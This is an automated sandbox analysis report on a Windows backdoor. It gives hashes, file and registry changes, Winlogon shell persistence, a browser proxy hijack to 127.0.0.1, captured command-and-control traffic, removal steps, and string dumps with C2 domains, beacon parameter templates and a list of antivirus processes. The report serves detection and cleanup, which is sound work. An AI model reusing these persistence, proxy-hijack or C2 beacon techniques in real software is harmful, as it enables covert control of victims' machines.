HEUR:Backdoor.Win32.Generic (Kaspersky), Gen:Variant.Kazy.318916 (B) (Emsisoft), Gen:Variant.Kazy.318916 (AdAware), Backdoor.Win32.Cycbot.FD, Trojan.Win32.Swrort.3.FD, BackdoorCycbot.YR (Lavasoft MAS)Behaviour: Trojan, Backdoor
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 433902d636a854854ec11eb2af93d1eb
SHA1: 8318113c3e8b3d493a66dd8c726f6adc4addefc8
SHA256: 082a78e0047ee92d4f072390e185efa4fd3eb543432e1b45b8b3d1e8042573ba
SSDeep: 3072:nYLcSldfhpukdE3ats J8vMtDS4AmN0mWotFowQjaxmiKqd1NDfCJyc:nYgS3hHdE/ J8vQDWotFvQjaIiKqdrDG
Size: 170496 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Premium Installer
Created at: 2005-09-22 00:51:49
Analyzed on: WindowsXP SP3 32-bit
Summary: Backdoor. Malware that enables a remote control of victim's machine.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Backdoor creates the following process(es):
%original file name%.exe:312
%original file name%.exe:912
The Backdoor injects its code into the following process(es):
%original file name%.exe:716
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:716 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Program Files%\LP\4645\1.exe (43 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT (4252 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (6520 bytes)
%Program Files%\LP\4645\2.exe (43 bytes)
%Documents and Settings%\%current user%\Application Data\507CF\F2C6.07C (3964 bytes)
%Documents and Settings%\%current user%\Application Data\507CF\5C946.exe (85017 bytes)
The Backdoor deletes the following file(s):
%Program Files%\LP\4645\1.exe (0 bytes)
%Program Files%\LP\4645\2.exe (0 bytes)
Registry activity
The process %original file name%.exe:312 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA 77 C5 AE 3C BC 5F 7F F5 2F 2F 1A 01 0E BE 28"
[HKLM\SOFTWARE\Microsoft\Direct3D\MostRecentApplication]
"Name" = "%original file name%.exe"
The process %original file name%.exe:716 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 03 00 00 00 14 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:59980"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB 87 2D 00 E8 D3 E2 B7 AB D2 85 C7 40 ED 04 19"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Direct3D\MostRecentApplication]
"Name" = "%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 03 00 00 00 03 00 00 00 14 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Backdoor adds the reference to itself to be executed when a user logs on:
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,%Documents and Settings%\%current user%\Application Data\507CF\5C946.exe"
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyOverride"
The process %original file name%.exe:912 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0A CC 7E 9F C6 DC 11 63 6D FA 2F 2F 7F 1A 7F D8"
[HKLM\SOFTWARE\Microsoft\Direct3D\MostRecentApplication]
"Name" = "%original file name%.exe"
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:312
%original file name%.exe:912 - Delete the original Backdoor file.
- Delete or disinfect the following files created/modified by the Backdoor:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Program Files%\LP\4645\1.exe (43 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT (4252 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (6520 bytes)
%Program Files%\LP\4645\2.exe (43 bytes)
%Documents and Settings%\%current user%\Application Data\507CF\F2C6.07C (3964 bytes)
%Documents and Settings%\%current user%\Application Data\507CF\5C946.exe (85017 bytes) - Remove the references to the Backdoor by modifying the following registry value(s) (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,%Documents and Settings%\%current user%\Application Data\507CF\5C946.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 88406 | 88576 | 5.42793 | 070e203a70fd851476c1701de8776828 |
.rdata | 94208 | 411368 | 2048 | 3.61765 | 05877b50493dde8d6c65bae0cf6cb2a6 |
.data | 507904 | 78026 | 78336 | 5.50496 | d4028b801d591d1af3b139f0e8561fd8 |
.rsrc | 589824 | 4096 | 512 | 0.601867 | b9ae4ae4d062b26b8666ed86581f1b48 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://binghamtonschools.org/images/ace/1/ace_1101278014_1314729789.jpg?sv=967&tq=gJ4WK/SUh7TFk0R8oY+QtMWTUj26kJH7yZJTNbqVybhqtUn5CGFATA== | 174.129.25.170 |
hxxp://l8x4b5.remindmeroster.com/logo.png?sv=114&tq=gKZEtzoYwLzEvUb5dQzRsrCqA/YvTca3l74EgC1OjrPGpgfib1XFp5zpRPksUt+A/gSoSEU= | 141.8.225.62 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /logo.png?sv=114&tq=gKZEtzoYwLzEvUb5dQzRsrCqA/YvTca3l74EgC1OjrPGpgfib1XFp5zpRPksUt+A/gSoSEU= HTTP/1.0
Connection: close
Host: l8x4b5.remindmeroster.com
Accept: */*
User-Agent: chrome/9.0
HTTP/1.1 200 OK
Date: Thu, 24 Jul 2014 05:56:23 GMT
Server: Apache
Set-Cookie: gvc=909vr1537269833728567; expires=Tue, 23-Jul-2019 05:56:23 GMT; path=/; domain=l8x4b5.remindmeroster.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 51
Keep-Alive: timeout=5, max=128
Connection: close
Content-Type: text/html; charset=UTF-8
<html><head></head><body><!-- vbe --></body></html>..
GET /images/ace/1/ace_1101278014_1314729789.jpg?sv=967&tq=gJ4WK/SUh7TFk0R8oY+QtMWTUj26kJH7yZJTNbqVybhqtUn5CGFATA== HTTP/1.0
Connection: close
Host: binghamtonschools.org
Accept: */*
User-Agent: chrome/9.0
HTTP/1.1 301 Moved Permanently
Server: nginx/1.4.2
Date: Thu, 24 Jul 2014 05:56:10 GMT
Content-Type: text/html
Content-Length: 184
Connection: close
Location: hXXp://VVV.binghamtonschools.org/images/ace/1/ace_1101278014_1314729789.jpg?sv=967&tq=gJ4WK/SUh7TFk0R8oY+QtMWTUj26kJH7yZJTNbqVybhqtUn5CGFATA==
<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.4.2</center>..</body>..</html>....
Map
The Backdoor connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_716:
`.rsrc
`.rsrc
.SS%o
.SS%o
SSj%S
SSj%S
<%u,V
<%u,V
<3%u1f
<3%u1f
cmd.exe
cmd.exe
GetProcessWindowStation
GetProcessWindowStation
operator
operator
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
1.2.5
>`Visual C CRT: Not enough memory to complete call to strerror.
>`Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
inflate 1.2.5 Copyright 1995-2010 Mark Adler
inflate 1.2.5 Copyright 1995-2010 Mark Adler
%d lines of %s read.
%d lines of %s read.
%d Function Prototypes found.
%d Function Prototypes found.
Including %d Library Functions.
Including %d Library Functions.
.bss align=16
.bss align=16
copy /b data.tmp bss.tmp code.tmp %s
copy /b data.tmp bss.tmp code.tmp %s
copy /b code.tmp data.tmp bss.tmp %s
copy /b code.tmp data.tmp bss.tmp %s
del *.tmp
del *.tmp
copy /b data.tmp code.tmp %s
copy /b data.tmp code.tmp %s
al,%s
al,%s
eax,%s
eax,%s
%s is not valid in:
%s is not valid in:
Warning - Return from non-void function %s with no value
Warning - Return from non-void function %s with no value
elend
elend
.text
.text
Warning -- "break" not supported in:
Warning -- "break" not supported in:
Error: %s not defined!
Error: %s not defined!
.data align=16
.data align=16
B1-1231 Warning - %s re-defined!
B1-1231 Warning - %s re-defined!
B1-1282 Warning - %s re-defined!
B1-1282 Warning - %s re-defined!
times %d db 0
times %d db 0
times %d dd 0
times %d dd 0
XML-20003: missing token %s at line %d, column %d
XML-20003: missing token %s at line %d, column %d
XML-20004: missing keyword %s at line %d, column %d
XML-20004: missing keyword %s at line %d, column %d
Action: Check/update the input data to the correct keyword.
Action: Check/update the input data to the correct keyword.
XML-20006: unexpected text at line %d column %d; expected EOF
XML-20006: unexpected text at line %d column %d; expected EOF
XML-20007: missing content model in element declaration at line %s, column %s
XML-20007: missing content model in element declaration at line %s, column %s
{35BCA615-C82A-4152-8857-BCC626AE4C8D}
{35BCA615-C82A-4152-8857-BCC626AE4C8D}
\Windows NT
\Windows NT
%s\%s
%s\%s
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
explorer.exe,%s
explorer.exe,%s
{A1D429DE-B782-4253-84AD-6E09A8438AD5}
{A1D429DE-B782-4253-84AD-6E09A8438AD5}
{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
lvvm.exe
lvvm.exe
{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}
{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}
{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}
{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}
{6B985724-623F-492e-B0D6-C9715ADE853B}
{6B985724-623F-492e-B0D6-C9715ADE853B}
{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}
{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}
Advapi32.dll
Advapi32.dll
%s%s_1
%s%s_1
%s_0_%d_%s
%s_0_%d_%s
%s_%d
%s_%d
%s_%d_%d_%d_%d
%s_%d_%d_%d_%d
%s_%s
%s_%s
http://xprstats.com/k1.php
http://xprstats.com/k1.php
type=%s&system=na&id=%s&status=%s
type=%s&system=na&id=%s&status=%s
t=st&q=%s
t=st&q=%s
%s?tq=%s
%s?tq=%s
TMFLDMN%d
TMFLDMN%d
id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=118
id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=118
%s_%s_%d
%s_%s_%d
_1_%d
_1_%d
_2_%d
_2_%d
_3_%d
_3_%d
_4_%d
_4_%d
grizlybigtit.com
grizlybigtit.com
cloudstorepro.com
cloudstorepro.com
remindmeroster.com
remindmeroster.com
yordatazone.com
yordatazone.com
sitystorefor.com
sitystorefor.com
datastorepro.com
datastorepro.com
onlinepdahelpforyou.com
onlinepdahelpforyou.com
remarkreddomas.com
remarkreddomas.com
transfersakkonline.com
transfersakkonline.com
backupdomaintolevel.com
backupdomaintolevel.com
SELECT_RESERV_SRV_%d
SELECT_RESERV_SRV_%d
http://%s.%s
http://%s.%s
%s.%s
%s.%s
stor.cfg
stor.cfg
exec%s
exec%s
%s_%d_%s
%s_%d_%s
id=%s&c=%d
id=%s&c=%d
%s_%d_%d_%d
%s_%d_%d_%d
%s_%d_%d
%s_%d_%d
%s %s
%s %s
%s start%s%c%s
%s start%s%c%s
c1.exe
c1.exe
c2.exe
c2.exe
c3.exe
c3.exe
DWN_CON_STRP_%d_%s
DWN_CON_STRP_%d_%s
http://
http://
http://%d.ctrl.%s
http://%d.ctrl.%s
logo.png
logo.png
img/135.png
img/135.png
img/136.png
img/136.png
t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d
t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d
t=%s&q=&s=%d&hrs=%d
t=%s&q=&s=%d&hrs=%d
%s/%s?sv=%d&tq=%s
%s/%s?sv=%d&tq=%s
%s:%d/%s?sv=%d&tq=%s
%s:%d/%s?sv=%d&tq=%s
http://binghamtonschools.org/images/ace/1/ace_1101278014_1314729789.jpg
http://binghamtonschools.org/images/ace/1/ace_1101278014_1314729789.jpg
http://binghamtonschools.org/images/297893.jpg
http://binghamtonschools.org/images/297893.jpg
http://binghamtonschools.org/images/297894.jpg
http://binghamtonschools.org/images/297894.jpg
http://alleducationalsoftware.com/creditcardlogos.gif
http://alleducationalsoftware.com/creditcardlogos.gif
http://alleducationalsoftware.com/creditcard.png
http://alleducationalsoftware.com/creditcard.png
http://alleducationalsoftware.com/creditcard2.png
http://alleducationalsoftware.com/creditcard2.png
http://patentgenius.com/temp/head.png
http://patentgenius.com/temp/head.png
http://patentgenius.com/132.gif
http://patentgenius.com/132.gif
http://patentgenius.com/133.gif
http://patentgenius.com/133.gif
http://freedownload3.com/screenshot/4/s/89_3276.gif
http://freedownload3.com/screenshot/4/s/89_3276.gif
http://freedownload3.com/screenshot/4/s/89_3277.gif
http://freedownload3.com/screenshot/4/s/89_3277.gif
http://freedownload3.com/screenshot/4/s/89_3278.gif
http://freedownload3.com/screenshot/4/s/89_3278.gif
http://istockanalyst.com/png/intel.gif
http://istockanalyst.com/png/intel.gif
http://istockanalyst.com/png/intel.jpg
http://istockanalyst.com/png/intel.jpg
http://istockanalyst.com/12.jpg
http://istockanalyst.com/12.jpg
http://complaintsboard.com/complaints/logo.png
http://complaintsboard.com/complaints/logo.png
http://complaintsboard.com/complaints/zip.png
http://complaintsboard.com/complaints/zip.png
http://complaintsboard.com/complaints/rar.png
http://complaintsboard.com/complaints/rar.png
http://highspeedinternetlosangeles.webnode.com/news/1.cgi
http://highspeedinternetlosangeles.webnode.com/news/1.cgi
http://highspeedinternetlosangeles.webnode.com/news/1.php
http://highspeedinternetlosangeles.webnode.com/news/1.php
http://highspeedinternetlosangeles.webnode.com/news/2.php
http://highspeedinternetlosangeles.webnode.com/news/2.php
http://newworldorderreport.com/favicon.ico
http://newworldorderreport.com/favicon.ico
http://newworldorderreport.com/img/3421.png
http://newworldorderreport.com/img/3421.png
http://newworldorderreport.com/img/3422.png
http://newworldorderreport.com/img/3422.png
http://jointhenewworldorder.com/images/pages.jpg
http://jointhenewworldorder.com/images/pages.jpg
http://jointhenewworldorder.com/images/pages.png
http://jointhenewworldorder.com/images/pages.png
http://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame6.png
http://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame6.png
http://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame7.png
http://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame7.png
http://cdn.adventofdeception.com/logo.png
http://cdn.adventofdeception.com/logo.png
t=t&hrs=%d&q=id=1000&ver=%s&s=%d
t=t&hrs=%d&q=id=1000&ver=%s&s=%d
t=ip&hrs=%d&q=&s=1
t=ip&hrs=%d&q=&s=1
%s?sv=%d&tq=%s
%s?sv=%d&tq=%s
\bl%d_64.bat
\bl%d_64.bat
del "%s"
del "%s"
if exist "%s" goto a
if exist "%s" goto a
cmd.exe /c "%s"
cmd.exe /c "%s"
GET %s HTTP/1.1
GET %s HTTP/1.1
Host: %s
Host: %s
User-Agent: chrome/9.0
User-Agent: chrome/9.0
{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d
{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d
{C66E79CE-8935-4ed9-A6B1-4983619CB925}
{C66E79CE-8935-4ed9-A6B1-4983619CB925}
{61B98B86-5F44-42b3-BCA1-33904B067B81}
{61B98B86-5F44-42b3-BCA1-33904B067B81}
{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
ahst.lni
ahst.lni
milktoyoustudios.com
milktoyoustudios.com
http://%s/s.php?c=121&id=%s
http://%s/s.php?c=121&id=%s
bigbulkhypnocrys.com
bigbulkhypnocrys.com
http://xprstats.com/images/logo.png
http://xprstats.com/images/logo.png
drweb
drweb
id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d
id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d
t=ml&q=%s
t=ml&q=%s
xprstats.com
xprstats.com
http://%s%s
http://%s%s
%s_1_%d_%s
%s_1_%d_%s
%s_2_%d_%s
%s_2_%d_%s
%s_3_%d_%s
%s_3_%d_%s
%s_4_%d_%s
%s_4_%d_%s
pmv=2&id=%s&hwid=%s
pmv=2&id=%s&hwid=%s
u.exe
u.exe
%s up%s
%s up%s
&%s=%s
&%s=%s
avgnt.exe
avgnt.exe
AVGIDSAgent.exe
AVGIDSAgent.exe
avgwdsvc.exe
avgwdsvc.exe
ccsvchst.exe
ccsvchst.exe
AvastUI.exe
AvastUI.exe
mcagent.exe
mcagent.exe
PRM_LSTN_THIS_PORT
PRM_LSTN_THIS_PORT
Opera
Opera
127.0.0.1
127.0.0.1
HTTP/1.x
HTTP/1.x
google.com
google.com
http://www.google.com
http://www.google.com
HTTP/1.1 302 Found
HTTP/1.1 302 Found
Location: %s
Location: %s
id=%s&type=%d&ppcid=%s
id=%s&type=%d&ppcid=%s
%s: %s
%s: %s
%s_5_%s
%s_5_%s
http=127.0.0.1:
http=127.0.0.1:
prefs.js
prefs.js
Mozilla
Mozilla
"network.proxy.http"
"network.proxy.http"
"network.proxy.http_port"
"network.proxy.http_port"
"network.proxy.type"
"network.proxy.type"
"127.0.0.1"
"127.0.0.1"
%s(%s, %s);
%s(%s, %s);
operaprefs.ini
operaprefs.ini
Use HTTP
Use HTTP
HTTP server
HTTP server
127.0.0.1:%s
127.0.0.1:%s
%s=%s
%s=%s
%s:%s
%s:%s
hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s
hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s
id=%s&hwid=%s
id=%s&hwid=%s
exec|%s
exec|%s
http=
http=
HTTP/1.0 200 OK
HTTP/1.0 200 OK
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
bing.com
bing.com
yahoo.com
yahoo.com
search.aol.
search.aol.
suche.aol.
suche.aol.
searcht2.aol.
searcht2.aol.
.yimg.com
.yimg.com
.bing.net
.bing.net
scorecardresearch.com
scorecardresearch.com
brightcove.com
brightcove.com
.aol.
.aol.
.atwola.
.atwola.
.ivwbox.
.ivwbox.
.atdmt.
.atdmt.
.abmr.
.abmr.
.tacoda.
.tacoda.
.adtechus.
.adtechus.
.autodatadirect.
.autodatadirect.
.mapquestapi.
.mapquestapi.
.ggpht.
.ggpht.
.virtualearth.
.virtualearth.
.opera.
.opera.
.microsoft.
.microsoft.
.wsod.
.wsod.
.doubleclick.
.doubleclick.
.ypcdn.
.ypcdn.
.truveo.
.truveo.
.tlowdb.
.tlowdb.
mapq.st
mapq.st
.dartsearch.
.dartsearch.
.thawte.
.thawte.
http://
http://
bing.com/search
bing.com/search
bing.com:80/search
bing.com:80/search
search.yahoo.com/search
search.yahoo.com/search
%s_1_%s
%s_1_%s
err%d%s_%d_%d
err%d%s_%d_%d
err0%s_%d_%d
err0%s_%d_%d
ver=118&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d
ver=118&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d
%s:443/%s
%s:443/%s
%s_2_%s
%s_2_%s
%s_%s_%s
%s_%s_%s
%s_3_%s
%s_3_%s
www.www.ru
www.www.ru
https://
https://
.doubleclick.net
.doubleclick.net
doubleclick.net
doubleclick.net
msn.com
msn.com
%s_0%d_%d
%s_0%d_%d
=='undefined'?'%s':'%s'
=='undefined'?'%s':'%s'
.referrer
.referrer
HTTP/1.0
HTTP/1.0
%s %s %s
%s %s %s
http://www.google.com/
http://www.google.com/
http://www.yahoo.com/
http://www.yahoo.com/
.class
.class
.midi
.midi
google_ad.url
google_ad.url
google_ad.title
google_ad.title
r.msn.com
r.msn.com
google_ad.line1
google_ad.line1
zcÁ
zcÁ
c:\%original file name%.exe
c:\%original file name%.exe
%Program Files%\CF2C6
%Program Files%\CF2C6
%Documents and Settings%\%current user%\Application Data\507CF
%Documents and Settings%\%current user%\Application Data\507CF
%Program Files%\LP\4645
%Program Files%\LP\4645
GetCPInfo
GetCPInfo
RegFlushKey
RegFlushKey
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
WinHttpReadData
WinHttpReadData
WinHttpOpenRequest
WinHttpOpenRequest
WinHttpOpen
WinHttpOpen
WinHttpQueryDataAvailable
WinHttpQueryDataAvailable
WinHttpReceiveResponse
WinHttpReceiveResponse
WinHttpSendRequest
WinHttpSendRequest
WinHttpConnect
WinHttpConnect
WinHttpCloseHandle
WinHttpCloseHandle
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
KERNEL32.DLL
KERNEL32.DLL
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
RASAPI32.dll
RASAPI32.dll
RPCRT4.dll
RPCRT4.dll
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
USER32.dll
USER32.dll
WINHTTP.dll
WINHTTP.dll
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
%-k}NB
%-k}NB
4Z.Xn
4Z.Xn
mscoree.dll
mscoree.dll
nKERNEL32.DLL
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
WUSER32.DLL
WUSER32.DLL
Dr.Web
Dr.Web
mhttp=127.0.0.1:%d
mhttp=127.0.0.1:%d
http://www.yahoo.com
http://www.yahoo.com
2.0.2.1
2.0.2.1
%original file name%.exe_716_rwx_0015C000_00001000:
|VirtualProtect.dll
|VirtualProtect.dll
%original file name%.exe_716_rwx_00400000_0008E000:
`.rsrc
`.rsrc
.SS%o
.SS%o
SSj%S
SSj%S
<%u,V
<%u,V
<3%u1f
<3%u1f
cmd.exe
cmd.exe
GetProcessWindowStation
GetProcessWindowStation
operator
operator
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
1.2.5
>`Visual C CRT: Not enough memory to complete call to strerror.
>`Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
inflate 1.2.5 Copyright 1995-2010 Mark Adler
inflate 1.2.5 Copyright 1995-2010 Mark Adler
%d lines of %s read.
%d lines of %s read.
%d Function Prototypes found.
%d Function Prototypes found.
Including %d Library Functions.
Including %d Library Functions.
.bss align=16
.bss align=16
copy /b data.tmp bss.tmp code.tmp %s
copy /b data.tmp bss.tmp code.tmp %s
copy /b code.tmp data.tmp bss.tmp %s
copy /b code.tmp data.tmp bss.tmp %s
del *.tmp
del *.tmp
copy /b data.tmp code.tmp %s
copy /b data.tmp code.tmp %s
al,%s
al,%s
eax,%s
eax,%s
%s is not valid in:
%s is not valid in:
Warning - Return from non-void function %s with no value
Warning - Return from non-void function %s with no value
elend
elend
.text
.text
Warning -- "break" not supported in:
Warning -- "break" not supported in:
Error: %s not defined!
Error: %s not defined!
.data align=16
.data align=16
B1-1231 Warning - %s re-defined!
B1-1231 Warning - %s re-defined!
B1-1282 Warning - %s re-defined!
B1-1282 Warning - %s re-defined!
times %d db 0
times %d db 0
times %d dd 0
times %d dd 0
XML-20003: missing token %s at line %d, column %d
XML-20003: missing token %s at line %d, column %d
XML-20004: missing keyword %s at line %d, column %d
XML-20004: missing keyword %s at line %d, column %d
Action: Check/update the input data to the correct keyword.
Action: Check/update the input data to the correct keyword.
XML-20006: unexpected text at line %d column %d; expected EOF
XML-20006: unexpected text at line %d column %d; expected EOF
XML-20007: missing content model in element declaration at line %s, column %s
XML-20007: missing content model in element declaration at line %s, column %s
{35BCA615-C82A-4152-8857-BCC626AE4C8D}
{35BCA615-C82A-4152-8857-BCC626AE4C8D}
\Windows NT
\Windows NT
%s\%s
%s\%s
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
explorer.exe,%s
explorer.exe,%s
{A1D429DE-B782-4253-84AD-6E09A8438AD5}
{A1D429DE-B782-4253-84AD-6E09A8438AD5}
{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
lvvm.exe
lvvm.exe
{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}
{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}
{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}
{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}
{6B985724-623F-492e-B0D6-C9715ADE853B}
{6B985724-623F-492e-B0D6-C9715ADE853B}
{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}
{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}
Advapi32.dll
Advapi32.dll
%s%s_1
%s%s_1
%s_0_%d_%s
%s_0_%d_%s
%s_%d
%s_%d
